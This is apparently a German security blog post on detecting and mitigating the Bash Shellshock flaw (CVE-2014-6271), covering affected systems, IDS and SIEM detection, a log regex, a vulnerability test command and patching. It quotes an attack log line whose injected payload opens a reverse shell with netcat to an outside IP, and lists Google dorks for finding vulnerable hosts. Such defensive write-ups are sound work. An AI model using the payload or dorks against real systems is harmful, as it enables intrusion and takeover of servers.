Bash Schwachstelle CVE-2014-6271 Shell Shock erkennen

CVE-2014-6271 Bash Shell Shock

Shell Shock Logo – Bild: Paul M. Gerhardt


Dieser Artikel enthält Information dazu, wie Sie die bash Schwachstelle CVE-2014-6271 Shell Shock erkennen und behandeln können.

Betroffene Systeme

Grundsätzlich sind alle Systeme betroffen, die eine “bash” einsetzen, also

  • Linux
  • Unix
  • AIX
  • Solaris
  • HPUX
  • D.h. auch viele Embedded Systems, Network Devices, Appliances

Die Remote Ausnutzung der Schwachstelle bedarf aber eines remote erreichbaren Dienstes, der in einer bestimmten Form Gebrauch von der Bash macht. Aus unserer Sicht stehen besonders all jene Systeme im Fokus , die eine simple Web Applikation anbieten oder eine Web Applikation, die systemnahe Befehle ausführt.

Beispiele:

  • Druckserver
  • Video-Kameras
  • Haustechnik
  • Anzeigesysteme
  • ILO Boards
  • ICS und SCADA Systeme
  • Appliances (proprietär mit Web Interface und reduziertem Remote Zugang)
  • Usw.

Aber auch jegliche einfache Web Applikation, die “popen()” oder “system()” calls verwendet. Auch finden sich des öfteren aktive Skripts in “cgi-bin” Ordnern, die entweder in Perl oder anderen eher empfindlichen Sprachen verfasst sind.
Große Web Frameworks wie CMS Systeme, J2EE oder Web Sphere sind mit hoher Wahrscheinlichkeit nicht verwundbar.

Kritikalität

Auch wenn der Angriffsvektor vielfältig ist und es keinen einfachen Weg der Erkennung von anfälligen Anwendung gibt, ist das Schadenspotential erheblich. Diese Einschätzung liegt darin begründet, dass wenn eine verwundbare Applikation gefunden wird, das dazugehörige Exploit extrem simpel anzuwenden sein wird. Es kann ein einfacher URL Aufruf oder eine “curl” Kommandozeile sein, die zur Ausnutzung der Schwachstelle benötigt wird.

Das Schadenspotential des Angriffs ist im Gegensatz zu Heartbleed auch deshalb enorm, weil der Angreifer den schadhaften Code direkt unter dem Benutzer des verwundbaren Dienstes ausführen kann und im schlimmsten Fall das System direkt komplett übernommen wird. Das ermöglicht auch die Entwicklung von Würmern, die gezielt die bereits bekannten Schwachstellen diverser Produkte ausnutzt und sich dann über diese Geräte verbreitet.

Die große Schwierigkeit besteht dann darin, solche “neuartigen” Würmer effizient und koordiniert zu entfernen, denn Appliances, Haustechnik und andere Embedded Devices stellten Sicherheitsorganisationen in der Vergangenheit bereits bei Würmern im Windows Umfeld vor große Herausforderungen.

Vektor: Vielfältig
Schaden: Hoch
Komplexität: Niedrig
Remote ausnutzbar: Ja (wenn remote angebotener Dienst bash Funktionen nutzt)

Erkennung

Das Problem mit dieser Schwachstelle ist, dass es keinen klaren Check oder Indikator auf Systemebene geben kann, denn die Schwachstelle ist nicht auf ein einzelnes verwundbares Skript oder Produkt beschränkt. Selbst die Ausnutzung über das DHCP Protokoll wurde bereits in einem POC demonstriert.
Verwundbare Skripte und Applikationen könnten in allen möglichen Produkten stecken.

Netzwerkebene

Die einzig sinnvolle Lösung ist derzeit die Erkennung im Netzwerkverkehr mittels IDS/IPS Systemen, die schadhafte Anfragen im HTTP Datenstrom oder anderen Protokollen an Hand von Signaturen erkennen und nötigenfalls die Verbindung direkt blocken können, wenn sie “inline” betrieben werden.

Systemebene

Eine Erkennung auf Systemebene ist nur schwer möglich, da die schadhaften Codes in die Umgebungsvariablen des Benutzers injiziert werden, unter dessen Konto der ausgenutzte Dienst läuft. Die Codes sind also nur im Speicher des Systems vorhanden.

Das System Diagnose Werkzeug “sysdig” hat bereits eine Lösung integriert, allerdings ist sie nur für die Überwachung von Einzelsystemen geeignet und bedarf noch aufwändiger Zusatzarbeiten, um die von Sysdig generierten Outputs zentral in ein Security Monitoring zu integrieren.

Wenn Apache Access Logs in einem Security Monitoring (SIEM) zusammengeführt werden, lohnt es sich diese Logfiles zu überwachen. Die Zeilen eines Angriffs und der derzeit bekannten Würmer sehen folgendermaßen aus (im Listing wird die Injection über den User-Agent String vorgenommen, der naütrlich im Log Format definiert sein muss):

213.5.67.223 - - [26/Sep/2014:10:37:34 +0200] "GET /cgi-bin/poc.cgi HTTP/1.1" 200 1066 "-" "() { :; }; /bin/nc -e /bin/sh 213.5.67.223 4444 &”

Eine Suche nach folgendem Regex in den Access Logs, kann schadhafte Request sichtbar machen:

\(\)\s\{.*;\s*\};

Verwundbarkeit feststellen

Um zu testen, ob die Bash eines Systems überhaupt verwundbar wäre, wenn ein angreifer von außen Codes injizieren kann, eignet sich folgender Aufruf:

env x='() { :;}; echo vulnerable' bash -c 'echo hello'

Wenn die Bash verwundbar ist, wird ein “vulnerable” ausgegeben”, ansonsten wird ein Fehler angezeigt.

Schutzmöglichkeiten

Patching

Diverse Hersteller von Linux Distributionen bieten bereits Patche an. Da viele der sofort bereitgestellten Patches keine Wirkung hatten, wurde ein neuer CVE-2014-7169 geöffnet, um die zwar gepatche aber dennoch verwundbare Bash Thematik zu behandeln. Diese CVE Nummer sollte also ebenso im Auge behalten werden.

Blocking via IPS / WAF

Wie oben bereits beschrieben, sehen wir die einzig derzeit verfügbare Schutzfunktion in IDS/IPS Systemen und WAFs. (Web Application Firewalls)
Sowohl die Open Source Lösungen Snort und Bro als auch professionelle IDS Systeme stehen Signaturen bereit, die bei einem “inline” installierten System auf “blocking” konfiguriert werden können. Die derzeitigen Angriffe gegen Webserver sind im Netzwerktraffic klar erkennbar und gut mit Regulären Ausdrücken kenntlich zu machen bzw. in Signaturen zu definieren.

Google Dorks

Mit Hilfe dieser Google Suchen können verwundbare Zielsysteme gefunden werden.

inurl:cgi-bin “GATEWAY_INTERFACE = CGI”
inurl:”server-status”  intitle:apache “cgi-bin”
sitemap.xml filetype:xml intext:”cgi-bin”
filetype:sh inurl:cgi-bin

Weitere Informationen

Informationen von Rapid7 (Metasploit)
Shell Shock Meldung auf Heise
Beispiele für die Ausnutzung der Schwachstelle

Auf dem Laufenden bleiben

Heise Security berichtet ausgiebig über die “Shell Shock” Schwachstelle.
http://www.heise.de/security/suche/?q=ShellShock&rm=search
Wir empfehlen auch den Twitter Stream zur Suche “CVE-2014-6271”.
https://twitter.com/search?q=CVE-2014-6271

Tags: , , , , , , ,

About Florian Roth

Senior IT Security Engineer: THOR APT Scanner, Security Monitoring and SIEM, Web Application Audits, Advanced Persistent Threats (APT), Malware Analysis, Incident Response, Intrusion Detection, Perl / Python / .NET Programming, Data Visualization

No comments yet.

Schreibe einen Kommentar